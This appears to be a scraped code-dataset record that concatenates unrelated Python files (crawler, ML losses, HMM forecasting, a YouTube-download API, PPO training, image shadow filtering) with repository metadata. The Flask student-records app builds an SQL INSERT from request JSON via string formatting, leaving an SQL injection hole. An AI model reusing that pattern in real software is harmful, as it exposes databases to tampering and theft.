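    assert longest_subsequence([1, 2, 3, 4], [0, 2, 3, 5]) == 2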
| JasmineZhangxyz/ewb-ml-censorship | similarity/metrics/list_metrics.py | list_metrics.py | py | 4,969 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "snownlp.SnowNLP",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "snownlp.SnowNLP",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "preprocessing.clean_data.b... |
7784263631 | import twitter
class pytwitter_forecast(NebriOS):
listens_to = ['forecast_date']
def check(self):
return True
def action(self):
auth = twitter.OAuth(shared.ttoken, shared.ttoken_secret, shared.tconsumer_key, shared.tconsumer_secret)
t = twitter.Twitter(auth=auth)
status = "Forecast: " + self.check_city_forecast + " is " + self.forecast_text + " with temperature "+ self.forecast_lo + " - " + self.forecast_hi + " °C for " + self.forecast_date
try:
t.account.verify_credentials()
try:
t.statuses.update(status=status)
# uncomment to update KVP of auth status for checking
#self.pytwitter_update = "Run"
except:
self.pytwitter_update = "Fail"
except:
self.pytwitter_auth = "Fail"
| bandono/nebri | tweet_rain/pytwitter_forecast.py | pytwitter_forecast.py | py | 874 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "twitter.OAuth",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "twitter.Twitter",
"line_number": 13,
"usage_type": "call"
}
] |
32316213655 | import time
import threading
import logging
import traceback
import datetime
import os
import sys
import re
import robotparser as rp
import numpy as np
import random
import util
import decide
import queries
from conn import connect
class Crawler:
'''
Abstract class for crawling a news source.
'''
########################
# #
# Abstract functions #
# #
########################
def sleep(self):
'''
Abstract function for waiting between requests.
Can add additional functionality, such as random sleep times.
'''
return NotImplemented
def is_article(self, url):
'''
Abstract function for determining if a url is an article or not.
Returns True if the url is an article, false otherwise.
'''
return NotImplemented
def extract_date_from_url(self, url):
'''
Abstract function for parsing a date from a url.
Currently crawler only works for sources with dates in their urls.
Takes a url as a string, returns a datetime.date object.
'''
return NotImplemented
############################
# #
# Non-Abstract functions #
# #
############################
def __init__(self, base_url_string):
'''
Not abstract.
Parameters:
base_url_string, a string representing the base url for a source (eg, foxnews.com)
article_regex, a string representing a regex which only matches for articles
'''
self.base_url_string = base_url_string
self.initialize_robots()
def initialize_robots(self):
'''
Not abstract.
Initializes a robot parser for the crawler.
Use self.robot_parser.can_fetch("*", url) to decide if allowed or not.
'''
base_url_string = self.base_url_string
robot_url = util.robots_url(base_url_string)
robot_parser = rp.RobotFileParser()
robot_parser.set_url(robot_url)
robot_parser.read()
self.robot_parser = robot_parser
def decide_next_visit(self, conn, crawl_id, bad_urls):
'''
Not abstract.
Decides which url to visit next.
Returns a dictionary visit_url with two keys
        visit_url['id'] - database id of the url to visit
        visit_url['url'] - string representation of the url to visit
        Returns None if no urls left to visit.
        Strategy is to visit anything not visited this crawl, with the following priority:
            1) base url
            2) internal pages linked from the base url
            3) articles which haven't been visited yet, sorted by date (most recent first)
'''
base_url_string = self.base_url_string
# strategy 1 - visit base url if not visited yet (ignore previous crawls)
base_url_id = queries.insert_url(conn, base_url_string)
base_url = {'id': base_url_id, 'url': base_url_string}
visited_base = decide.visited_base_url(conn, crawl_id)
if not visited_base:
return base_url
# strategy 2 - visit any urls linked by the base url that haven't been visited yet (ignore previous crawls)
urls = decide.find_unvisited_links_from_base(conn, crawl_id, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
if len(urls) > 0:
visit_url = random.choice(urls)
return visit_url
# strategy 3 - visit any articles not visited yet (including previous crawls), starting with the most recent
urls = decide.find_unvisited_internal_urls(conn, base_url_string)
urls = filter(lambda url: self.robot_parser.can_fetch("*", url['url']), urls)
urls = filter(lambda url: url['id'] not in bad_urls, urls)
urls = filter(lambda url: self.is_article(url['url']), urls)
if len(urls) > 0:
dates = map(lambda url: self.extract_date_from_url(url['url']), urls)
reverse_sorted_dates = np.argsort(np.array(dates))[::-1]
last_date_index = reverse_sorted_dates[0]
visit_url = urls[last_date_index]
return visit_url
return None
def crawl(self):
'''
Not abstract. Begins a crawl.
Crawls until MAX_VISITS is reached, unless:
- self.decide_next_visit(conn) returns None
- Five exceptions in a row
'''
# initialize variables
visits = 0
MAX_VISITS = 1000 # so we don't just keep crawling forever
bad_urls = set() # when a url doesn't work, add url_id to bad_urls, ignore in future
error_count = 0
base_url_string = self.base_url_string
conn = connect()
# initialize logging
initialize_logging(base_url_string)
start_time = time.time()
logging.info('STARTING CRAWL AT TIME: {0}'.format(util.time_string(start_time)))
        # initialize database for this crawl
base_url_id = queries.insert_url(conn, base_url_string)
source_id = queries.insert_source(conn, base_url_string)
crawl_id = queries.insert_crawl(conn, base_url_string)
while True:
if error_count == 5:
logging.error('Too many exceptions in a row, exiting.')
break
visit_url = self.decide_next_visit(conn, crawl_id, bad_urls)
if visit_url is None:
logging.info('Finished crawling, no more urls to visit.')
break
try:
logging.info('Visiting {}'.format(visit_url['url']))
self.visit(conn, crawl_id, source_id, visit_url)
error_count = 0
except Exception as e:
logging.error('Error when downloading {0}'.format(visit_url['url']))
logging.error(traceback.format_exc())
bad_urls.add(visit_url['id'])
error_count += 1
visits += 1
if visits == MAX_VISITS:
logging.info('Finished crawling, reached max visits of {}'.format(MAX_VISITS))
break
self.sleep()
def visit(self, conn, crawl_id, source_id, visit_url):
'''
Not abstract. Visits a url during a crawl.
Inserts all relevant information to the database for a single visit.
Inserts article information if the url matches the article regex.
'''
visit_url_id = visit_url['id']
visit_url_string = visit_url['url']
base_url_string = self.base_url_string
html = util.download_html(visit_url_string)
found_links = util.extract_links(html, base_url_string)
visit_id = queries.insert_visit(conn, crawl_id, visit_url_id)
new_url_ids = queries.insert_urls(conn, found_links)
queries.insert_links(conn, visit_id, new_url_ids)
if self.is_article(visit_url_string):
article = util.extract_article(html, visit_url_string)
article_title = article.title
article_text = article.text
article_date = self.extract_date_from_url(visit_url_string)
queries.insert_article(conn, visit_url_id, article_title, article_text, article_date, source_id)
def initialize_logging(base_url):
log_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'logs')
if not os.path.exists(log_dir):
os.makedirs(log_dir)
source_str = util.extract_source(base_url)
log_filename = 'LOG_{0}.log'.format(source_str)
log_path = os.path.join(log_dir, log_filename)
logging.basicConfig(filename=log_path, filemode='a', level=logging.INFO)
stderrLogger=logging.StreamHandler()
stderrLogger.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logging.getLogger().addHandler(stderrLogger)
sys.excepthook = log_unchecked_exception
def log_unchecked_exception(exctype, value, tb):
traceback.print_tb(tb)
log_str = '''
UNCHECKED EXCEPTION
Type: {}
Value: {}
Traceback: {}'''.format(exctype, value, traceback.print_tb(tb))
logging.error(log_str)
| bentruitt/TopicStory | topicstory/crawler/crawler.py | crawler.py | py | 8,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.robots_url",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "robotparser.RobotFileParser",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "queries.insert_url",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "decide... |
18482541642 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
class FocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
reduction='mean',
loss_weight=1.0):
super(FocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.gamma = gamma
self.alpha = alpha
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None):
device = pred.device
assert pred.shape[0] == target.shape[0]
if len(target.shape) == 1:
target = torch.zeros(
pred.shape,
dtype=torch.long,
device=device).scatter_(
1, target.view(-1, 1), 1)
pred_sigmoid = pred.sigmoid()
pred_sigmoid = torch.clamp(pred_sigmoid, 1e-4, 1.0 - 1e-4)
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (self.alpha * target + (1 - self.alpha) *
(1 - target)) * pt.pow(self.gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = torch.where(torch.ne(target, -1.0),
loss, torch.zeros(loss.shape).to(device))
loss = self.loss_weight * weight_reduce_loss(
loss,
weight=weight,
reduction=self.reduction,
avg_factor=avg_factor)
return loss
| TWSFar/FCOS | models/losses/focal_loss.py | focal_loss.py | py | 1,798 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.long",
"line_number... |
39184736012 | ####################### IMPORT LIBRARIES ####################################
from pandas import ExcelFile, read_excel
from pandas import datetime
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from hmmlearn.hmm import GaussianHMM
import numpy as np
import time
####################### FUNCTION TO READ FILE ################################
def readfile(coin_file, attribute):
''' Function to read and parse the data '''
# Read excel file
xls = ExcelFile(coin_file)
# Date parser
def parser(x):
try:
return datetime.strptime(str(x),'%Y-%m-%d %H:%M:%S')
except:
return datetime.strptime(str(x),'%Y-%m-%d')
series = read_excel(xls, attribute, header = 0, parse_dates =[0], index_col = 0, squeeze = True, date_parser = parser)
series = series.fillna(0)
# Store in array
X = series.values
return X
###################### FUNCTION TO SPLIT THE DATA INTO TRAINING AND TEST SET #######
def train_test_split(X, fraction):
''' Function to split the data into training and test set '''
# Train test split
size = int(len(X)*fraction)
train,test = X[0:size], X[size:len(X)]
return train,test
##################### FUNCTION TO DEFINE GAUSSIAN HIDDEN MARKOV MODEL ###############
def GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test):
''' Function to define Gaussian Hidden Markov Model '''
# Reshape training data
history = train.reshape(-1,1)
# Gaussian hidden markov model
hmm = GaussianHMM(n_components = n_comp, covariance_type = cov_type, n_iter = n_itr)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hmm.fit(history)
# Generate samples
samples_test, _ = hmm.sample(num_samples_test)
return samples_test
###################### FUNCTION TO CALCULATE PREDICTIONS AND EXPECTATIONS #############
def pred_expect(test,variable, samples_test, pred, expect):
''' Function to calculate predictions and expectations '''
# Loop over test data
for i in range(len(test)):
# Integer values
if variable == 'int':
if round(samples_test[i][0]) < 0:
pred.append(0)
else:
pred.append(round(samples_test[i][0]))
# decimal values
else:
if samples_test[i][0] < 0:
pred.append(0)
else:
pred.append(samples_test[i][0])
expect.append(test[i])
return pred, expect
############################# FUNCTION TO CALCULATE RMSE ###############################
def rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var):
''' Function to calculate RMSE '''
X = readfile(coin_file,attribute)
train,test = train_test_split(X,fraction)
rmse_test = list()
for j in range(iterations):
######################## FOR FINAL RMSE ############################
pred = list()
expect = list()
num_samples_test = len(test) # number of samples to be generated
samples_test = GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test)
pred,expect = pred_expect(test,var,samples_test, pred, expect)
rmse_test.append(sqrt(mean_squared_error(pred,expect)))
return rmse_test
##################### PRINT AVERAGE RMSE FOR TEST DATA #####################
coin_file = '4_RLC.xlsx' # Filename
attribute = 'exchange' # attribute
iterations = 30 # number of iterations for averaging rmse
fraction = 0.80 # Train - test split
n_comp = 7 # n_components for Gaussian HMM
cov_type = 'diag' # covariance_type for Gaussian HMM
n_itr = 1000 # n_iter for Gaussian HMM
var = 'float' # Integer or Float valued attribute
start = time.time()
rmse_test = rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var)
end = time.time()
print('The average RMSE over %d iterations is %.3f' %(iterations,np.array(rmse_test).mean()))
print('The time taken is %.3f seconds' %(end - start))
| srihari1212/bloqq | HMM/Docstring_HMM_test.py | Docstring_HMM_test.py | py | 4,173 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.ExcelFile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.datetime.strptime",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.datetime",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "pandas.date... |
10567641757 | import time
from datetime import datetime, timedelta
from pydantic import BaseModel
from fastapi import FastAPI, Depends, File, UploadFile, HTTPException, Request, status
from fastapi.responses import HTMLResponse, JSONResponse, FileResponse
import uvicorn
import os
from pytube import YouTube
from pytube import Playlist
from pytube.cli import on_progress
app = FastAPI()
class Info(BaseModel):
author: str
title: str
view: float
length: int
description: str
thumbnail: str
fileSizeHD: str
@app.get("/")
async def hello():
return {"result": "Its working YES! This is a miracle!"}
@app.get("/info")
async def info(url: str = None):
try:
yt = YouTube(url)
videoSize = yt.streams.get_highest_resolution()
Info.author = yt.author
Info.title = yt.title
Info.view = yt.views
Info.length = ("%.2f" % float(yt.length / 60))
Info.description = yt.description
Info.thumbnail = yt.thumbnail_url
Info.fileSizeHD = str(round(videoSize.filesize * 0.000001, 2)) + " Mb"
res = {None}
for i in yt.streams:
res.add(i.resolution)
res.remove(None)
res = [int(i) for i in [sub.replace('p', '') for sub in res]]
sres = sorted(res)
return { "Title": Info.title, "Resolution": sres, "Author": Info.author, "Thumbnail": Info.thumbnail, "View": Info.view,
"Length": Info.length, "Description": Info.description,
"File size": Info.fileSizeHD}
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)})
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success'})
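# Example request (illustrative; <VIDEO_ID> is a placeholder):
#   GET /info?url=https://www.youtube.com/watch?v=<VIDEO_ID>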
@app.get("/video")
async def video(url: str = None):
try:
yt = YouTube(url, on_progress_callback=on_progress)
yd = yt.streams.get_highest_resolution()
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
video = yd.download(file_path)
yt.title
print(file_path)
headers = {'success': f'video is ready, filename= {yt.title}'}
return FileResponse(path=video, headers=headers, media_type='application/mp4', filename=(yt.title + ".mp4"))
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)}
)
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success, video is ready'}
)
@app.get("/audio")
async def audio(url: str = None):
try:
ya = YouTube(url)
folder_name = "FILE_NAME"
# DEPENDS ON WHERE YOUR FILE LOCATES
file_path = os.getcwd() + "/" + folder_name
video = ya.streams.filter(only_audio=True).first()
downloaded_file = video.download(file_path)
base, ext = os.path.splitext(downloaded_file)
audio = base + 'Audio.mp3'
os.rename(downloaded_file, audio)
ya.title
print(file_path)
print(audio)
headers = {'success': f'audio is ready, filename= {ya.title}'}
return FileResponse(path=audio, headers=headers, media_type='application/mp4', filename=(ya.title+".mp3"))
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)}
)
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success, audio is ready'}
)
@app.get("/delete")
async def delete_files(min: int = 10):
try:
response_msg = []
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
path = file_path
files = os.listdir(file_path)
print(files)
print(f"file_path: {file_path}")
file_name_delete = []
dir_name = file_path
# Get list of all files only in the given directory
list_of_files = filter(lambda x: os.path.isfile(os.path.join(dir_name, x)),
os.listdir(dir_name))
# Sort list of files based on last modification time in ascending order
list_of_files = sorted(list_of_files,
key=lambda x: os.path.getmtime(os.path.join(dir_name, x))
)
for file_name in list_of_files:
file_path = os.path.join(dir_name, file_name)
timestamp_str = time.strftime('%m/%d/%Y :: %H:%M:%S', time.gmtime(os.path.getmtime(file_path)))
print(timestamp_str, ' -->', file_name)
#filter by minite
now = datetime.now()
timestamp = datetime.timestamp(now)
f = os.path.getmtime(file_path)
file_date = datetime.fromtimestamp(f)
file_date_age = file_date + timedelta(minutes=min)
duration = now - file_date_age
duration_in_s = duration.total_seconds()
minut = (int(round(duration_in_s / 60, 0)))
print(f"duration: {minut}")
if minut > min:
file_name_delete.append(file_name)
### create a list of old file by date
print(f"file_name_delete {len(file_name_delete)}, {file_name_delete}")
#print(os.listdir(path))
for i in file_name_delete:
#for file_name_delete in os.listdir(path):
print(f"file_name: {file_name_delete}")
#print(f"path: {path}")
# construct full file path
del_file = path + "/" + i
#print(f"file: {del_file}")
if os.path.isfile(del_file):
response_msg.append(f"Deleting file: {del_file}")
print('Deleting file:', del_file)
os.remove(del_file)
print(len(del_file))
if len(response_msg) < 1:
# response_msg.clear()
response_msg.append(f"no files to delete after: {min} min")
return response_msg
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)})
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success'})
@app.get("/aws")
async def aws_files():
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
files = os.listdir(file_path)
result = []
dir_name = file_path
# Get list of all files only in the given directory
list_of_files = filter(lambda x: os.path.isfile(os.path.join(dir_name, x)),
os.listdir(dir_name))
# Sort list of files based on last modification time in ascending order
list_of_files = sorted(list_of_files,
key=lambda x: os.path.getmtime(os.path.join(dir_name, x))
)
for file_name in list_of_files:
file_path = os.path.join(dir_name, file_name)
size = ("%.2f" % float(os.path.getsize(file_path)*0.000001))
timestamp_str = time.strftime('%m/%d/%Y :: %H:%M:%S', time.gmtime(os.path.getmtime(file_path)))
result.append(f"({timestamp_str}, ' -->', {file_name}, ' -->', {size}' MB')")
return result
def raise_exception():
return HTTPException(status_code=404,
detail="Input is Not valid!",
headers={"X-Header_Error":
f"Nothing to be seen"})
if __name__ == "__main__":
uvicorn.run("main:app", host="127.0.0.1", port=5000, reload=True, log_level="info", workers=2)
print('Download Complete')
| uponex/YoutubeAPI | main.py | main.py | py | 7,761 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pydantic.BaseModel",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "pytube.YouTube",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "fastapi.responses.J... |
23313577208 | import argparse
import gym
import random
import tensorflow as tf
import numpy as np
from tqdm import trange
from tensorflow import keras
from network import SharedModel
from subproc_env import EnvActor, SubProcessEnv
# Some parameters taken from OpenAI
# baselines implementation, since
# they're not mentioned in the paper.
num_actors = 8
# Values taken from Atari experiments
# in original paper where relevant
gae_lambda = 0.95
gamma = 0.99
base_clip_epsilon = 0.1
max_steps = 1e6
base_learning_rate = 2.5e-4
horizon = 128
batch_size = 32
optim_epochs = 3
value_loss_coefficient = 1
entropy_loss_coefficient = .01
gradient_max = 10.0
start_t = 0
checkpoint_filename = "./ppo-model.ckpt"
log_dir = "./tb_log"
SMALL_NUM = 1e-8
def main():
env_name = "PongNoFrameskip-v4"
# NOTE: This is currently not used since we use SubProcessEnv instead;
# only used for getting shape of observation/acton space.
unused_env = gym.make(env_name)
#pobs_shape = unused_env.observation_space.shape
# Hard-coding pre-processing step shape; could read it from an example output instead?
obs_shape = (84, 84, 4)
num_actions = unused_env.action_space.n
model = SharedModel(obs_shape, num_actions)
t = start_t
last_save = 0
actors = []
for ii in range(num_actors):
actors.append(EnvActor(SubProcessEnv(env_name), model, num_actions))
while(t <= max_steps):
for ii in range(horizon):
for actor in actors:
actor.step_env(t)
t += 1
for actor in actors:
actor.calculate_horizon_advantages(t)
# Construct randomly sampled (without replacement) mini-batches.
obs_horizon = []
act_horizon = []
policy_horizon = []
adv_est_horizon = []
val_est_horizon = []
for actor in actors:
obs_a, act_a, policy_a, adv_est_a, val_est_a = actor.get_horizon(t)
obs_horizon.extend(obs_a)
act_horizon.extend(act_a)
policy_horizon.extend(policy_a)
adv_est_horizon.extend(adv_est_a)
val_est_horizon.extend(val_est_a)
# Normalizing advantage estimates.
# NOTE: Adding this significantly improved performance
# NOTE: Moved this out of each individual actor, so that advantages for the whole batch are normalized with each other.
adv_est_horizon = np.array(adv_est_horizon)
adv_est_horizon = (adv_est_horizon - np.mean(adv_est_horizon)) / (np.std(adv_est_horizon) + SMALL_NUM)
num_samples = len(obs_horizon)
indices = list(range(num_samples))
for e in range(optim_epochs):
random.shuffle(indices)
ii = 0
# TODO: Don't crash if batch_size is not a divisor of total sample count.
while ii < num_samples:
obs_batch = []
act_batch = []
policy_batch = []
adv_batch = []
value_sample_batch = []
for _ in range(batch_size):
index = indices[ii]
obs_batch.append(obs_horizon[index].__array__())
act_batch.append(act_horizon[index].__array__())
policy_batch.append(policy_horizon[index].__array__())
adv_batch.append(adv_est_horizon[index].__array__())
value_sample_batch.append(val_est_horizon[index])
ii += 1
def alpha_anneal(t):
return np.maximum(1.0 - (float(t) / float(max_steps)), 0.0)
total_loss = model.train(np.array(obs_batch),
np.array(act_batch),
np.array(policy_batch),
np.array(adv_batch),
np.array(value_sample_batch),
alpha_anneal(t))
for actor in actors:
actor.flush(t)
if t-last_save > 10000:
print("Saving network")
model.network.save(checkpoint_filename)
last_save = t
all_ep_rewards = []
for actor in actors:
all_ep_rewards.extend(actor.episode_rewards)
if len(all_ep_rewards) >= 10:
print("T: %d" % (t,))
print("\tAVG Reward: %f" % (np.mean(all_ep_rewards),))
print("\tMIN Reward: %f" % (np.amin(all_ep_rewards),))
print("\tMAX Reward: %f" % (np.amax(all_ep_rewards),))
for actor in actors:
actor.episode_rewards = []
if __name__ == '__main__':
main() | james-sorrell/reinforcement_learning | atari/ppo/main.py | main.py | py | 4,674 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "gym.make",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "network.SharedModel",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "subproc_env.EnvActor",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "subproc_env.SubProc... |
16828444501 | from flask import Flask,request
import sqlite3
app = Flask(__name__)
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute('create table if not exists students (sid integer primary key,name text,age integer,address text)')
connection.close()
@app.route('/student_details')
def details():
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
return {'students' : list(curser.execute('select * from students'))}
@app.route('/details',methods = ['POST'])
def register():
data = request.get_json()
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
    # parameterized query: maps each value to its own column and avoids SQL injection
    curser.execute("insert into students values(?, ?, ?, ?)",
                   (data['sid'], data['name'], data['age'], data['address']))
connection.commit()
connection.close()
return 'User Created Successfully.. '
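# Example request for the POST endpoint (illustrative field values):
#   curl -X POST http://127.0.0.1:5000/details -H "Content-Type: application/json" \
#        -d '{"sid": 1, "name": "Asha", "age": 20, "address": "Pune"}'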
app.run(port=5000) | mubarakdalvi/mubarakdalvi | studnt_management.py | studnt_management.py | py | 868 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
... |
# Data preprocessing: shadow filtering
#yangzhen
#2020.4.13
#translate from matlab
"""get the shadow proportion from images
of remote sensing"""
import numpy as np
import cv2
import os
import json
from shutil import copyfile
import argparse
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),1)
return cv_img
def cv_imwrite(filepath,img):
cv2.imencode(".png",img)[1].tofile(filepath)
def standard(data):
    '''Standardize an image band.
    Input: single-channel image
    Output: standardized (0-1) single-channel image'''
mdata = data.copy()
irow, icol = mdata.shape[0:2]
mdata = np.reshape(mdata, [irow*icol, 1])
temp1 = mdata - np.min(data)
result = temp1/(np.max(data)-np.min(data))
result = np.reshape(result, [irow, icol])
np.seterr(divide='ignore', invalid='ignore')
return result
def GetLight(img):
    '''Compute brightness weighted for human visual perception'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = 0.04*R+0.5*G+0.46*B
return result
def GetColor(img):
    '''Normalize to chromaticity space'''
mimg = img.copy()
misc = mimg[:,:,0]+mimg[:,:,1]+mimg[:,:,2]
misc[misc == 0] = 0.0000001
mimg[:,:,0] = img[:,:,0]/misc
mimg[:,:,1] = img[:,:,1]/misc
result = np.abs(mimg - img)
result = (result[:,:,0]+result[:,:,1])/2
return result
def GetVege(img):
    '''Extract the vegetation feature'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = G-np.minimum(R, B)
result[result<0] = 0
return result
def GetLDV(idist, ilight, ivege):
    '''Overall decision: combine the three features'''
idist = standard(idist)
ilight = standard(ilight)
ivege = standard(ivege)
result = idist-ilight-ivege
result[result<0]=0
return result
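# Rough intuition (illustrative numbers): after standardization, a pixel with
# idist = 0.9, ilight = 0.1, ivege = 0.0 gets LDV = 0.9 - 0.1 - 0.0 = 0.8 (shadow
# candidate), while a bright or vegetated pixel is clipped to 0.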
def FinalTrare(img):
    '''Post-process the result (Otsu threshold + median blur)'''
mimg = img.copy()
mimg = np.uint8(standard(mimg)*255)
T, result = cv2.threshold(mimg, 0, 255, cv2.THRESH_OTSU)
result = cv2.medianBlur(result, 7)
return result
def ShadowsProportion(path:{}):
"""
    Shadow extraction.
    @@path: {},
    @path[0] directory of images to check for shadows
    @path[1] output directory for images below the shadow threshold
    @path[2] shadow proportion threshold
    ps: when the images are too large they are processed in tiles
"""
File_in = path[0]
File_out = path[1]
T = path[2]
mpath = path[3]
File_out2=path[4]
if not os.path.exists(File_out):
os.makedirs(File_out)
if not os.path.exists(File_out2):
os.makedirs(File_out2)
    # Start detection
namelist=[]
for filename in os.listdir(File_in):
if not filename.find('.png') == -1:
namelist.append(filename)
n = len(namelist)
fid = open('ShadowsProportion.txt', 'w')
for i in range(n):
filenamein = os.path.join(File_in, namelist[i])
img = cv_imread(filenamein)
        # Extract the shadow mask
img1 = img.astype(np.float)
img1[:,:,0] = standard(img[:,:,0])
img1[:,:,1] = standard(img[:,:,1])
img1[:,:,2] = standard(img[:,:,2])
idist = GetColor(img1)
ilight = GetLight(img1)
ivege = GetVege(img1)
final = GetLDV(idist, ilight, ivege)
shadow = FinalTrare(final)
shadow = shadow/255
        # Compute the shadow proportion and record it
S = shadow.size
s = np.sum(sum(shadow))
iratio = s/S
fid.write(namelist[i] + ',' + str('%.3f' % iratio) + '\n')
        # Keep images whose shadow proportion is below the threshold
filenameout = os.path.join(File_out, namelist[i])
filenameout2 = os.path.join(File_out2, namelist[i])
mapout = mpath.replace('rawdata','noshade')
if not os.path.exists(mapout):
os.makedirs(mapout)
if iratio < T:
cv_imwrite(filenameout, img)
copyfile(os.path.join(mpath,namelist[i]),(os.path.join(mapout,namelist[i])))
else :
cv_imwrite(filenameout2, img)
fid.close()
def takejson(getjson):
json1 = json.loads(getjson)
path = {}
path[0] = json1['rpath']
path[1] = path[0].replace('rawdata','noshade')
path[2] = json1['shadowProportion']
path[3]=json1['mpath']
path[4]=path[0].replace('rawdata','withshade')
#print (path)
ShadowsProportion(path)
print ('Shadow filtering Completed')
if __name__ == "__main__":
    # Get the input image path, shadow proportion threshold, and output path
# File_in = input('Please input the data file name:')
# T = float(input('Please input the threshold value:'))
# File_out = input('Please input the out-img filename:')
parser = argparse.ArgumentParser()
    parser.add_argument('--input_json', type=str, help='input JSON string')
args = parser.parse_args()
# json1={'rpath':r'F:\Chicago2\metadata\谷歌影像无标注\14\14_14aligned','mpath':r'F:\Chicago2\metadata\谷歌地图无标注\14\14_14aligned','shadowProportion':0.2}
# getjson=json.dumps(json1)
takejson(args.input_json)
| jansona/GeoScripts | shadow_filter/shadowfilter.py | shadowfilter.py | py | 4,966 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imdecode",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "cv2.imencode",
"line... |
40083862973 | #!/usr/bin/env python3
import argparse
import random
import json
import re
import importlib.util
import os.path
import sys
import types
import inspect
import pandas as pd
import numpy as np
MAX_SLOT=8
SMART_COMMENT="\\s*#+\\s*(fastscore|odg)\\.(\\S*)\\s*:\\s*(\\S*)\\s*$"
def is_input_slot(s):
return s % 2 == 0
## Parse command line
parser = argparse.ArgumentParser()
parser.add_argument("source_file", metavar="MODEL")
parser.add_argument("-i", "--input:0", action="store", help="Name of the input file (slot 0)", metavar="FILE")
parser.add_argument("-o", "--output:1", action="store", help="Name of the output file (slot 1)", metavar="FILE")
parser.add_argument("-b", "--batch-size", action="store", type=int, default=10, help="Name of the output file (slot 1)", metavar="NUM")
#parser.add_argument("-v", "--verbose", action="store_true", help="Increase verbosity")
# Add more --input/--output options
for s in range(2,MAX_SLOT):
tag = "input" if is_input_slot(s) else "output"
parser.add_argument("--{}:{}".format(tag,s), action="store", help="Name of the {} file (slot {})".format(tag,s), metavar="FILE")
args = parser.parse_args()
def check_scope(scope):
if scope in ["$all", "$in", "$out"]:
return scope
else:
try:
return int(scope)
except ValueError:
print("Smart comment not recognized")
def default_scope(item):
if item == "recordsets":
return "$all"
elif item == "action":
return "$in"
elif item == "slot":
return "$all"
elif item == "schema":
return "$all"
else:
return None
def parse_comments1(line, slots):
if re.match(SMART_COMMENT, line):
tokens = re.split(SMART_COMMENT,line)
item0=tokens[2]
value=tokens[3]
x=item0.split(".")
item=x[0]
